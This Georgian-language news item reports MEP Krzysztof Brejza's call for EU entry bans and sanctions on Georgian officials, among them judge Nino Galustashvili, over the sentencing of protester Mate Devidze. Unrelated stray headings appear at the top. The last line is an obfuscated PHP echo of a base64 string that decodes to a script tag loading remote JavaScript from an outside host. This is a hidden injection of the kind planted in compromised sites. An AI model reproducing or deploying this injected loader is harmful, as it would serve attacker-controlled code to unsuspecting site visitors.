global distribution
გარე ავეჯი

მსურს, ამ ქალს [მოსამართლე ნინო გალუსტაშვილი] არდადეგების იტალიაში გატარების პრივილეგია არ ჰქონდეს, მსურს, რომ პრორუსული რეჟიმის ყველა ოფიციალურ პირს აეკრძალოს ევროკავშირში შესვლა , - ამის შესახებ ევროპარლამენტარმა კშიშტოფ ბრეიზამ განაცხადა.

მისი თქმით, მკაცრი სანქციებია საჭირო მათ „მოსაშორებლად, ვინც საქართველოს რუსიფიკაციას“ ახდენს.

ასმთან, ევროპარლამენტარმა აღნიშნა, რომ ვიქტორ ორბანისა და “ალტერნატივა გერმანიისთვის” წარმომადგენლებს სურთ, რომ საქართველო იყოს მიტოვებულები და მათ მიმართა: “თქვენ კრემლსა და პუტინზე მუშაობთ”.

“გასულ თვეს მისიით ვიყავი საქართველოში და არ შეიძლება რუსულ ჩარევაზე ლაპარაკობდეთ, ეს რუსული სისტემის, რუსული რეჟიმის კოპირებაა. როდესაც ვიქტორ ორბანისა და “ალტერნატივა გერმანიისთვის” ხმები მესმის, რომლებიც აქ ლაპარაკობენ, რომლებსას პუტინის მხარდაჭერა აქვთ და რომლებსაც სურთ, რომ ახალგაზრდა ქართველები მარტოდ იყვნენ მიტოვებულები რუსეთისთვის გადასაცემად, ნათლად უნდა ითვას: “თქვენ კრემლსა და პუტინზე მუშაობთ”...

ქართველებს ვეტყვი: “თქვენთან ვართ, გვერდში გიდგავართ, თქვენს ბრძოლას ვხედავთ”. მაგრამ ჩვენ ასევე ვხედავთ მათ, ვინც დანადგურებენ. ვხედავთ რეჟიმის ოფიციალურ პირებს, როგორიცაა მოსამართლე ნინო გალუსტაშვილი. ის საქართველოს რეჟიმის მოსამართლეა, რომელმაც 21 წლის ბიჭს, მათე დევიძეს, პატიმრობის ოთხ წელიწად-ნახევარი მიუსაჯა პროევროპული დემონსტრაციის ორგანიზებისთვის. ეს რეალობაა საქართველოში.

მსურს, რომ ამ ქალს თავისი არდადეგების იტალიაში გატარების პრივილეგია არ ჰქონდეს. მსურს, რომ პრორუსული რეჟიმის ყველა ოფიციალურ პირს აეკრძალოს ევროკავშირში შესვლა. მკაცრი სანქციები გვჭირდება იმათ მოსაშორებლად, ვინც საქართველოს რუსიფიკაციას ახდენენ,” - განაცხადა ევროპარლამენტარმა კშიშტოფ ბრეიზამ.

230
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");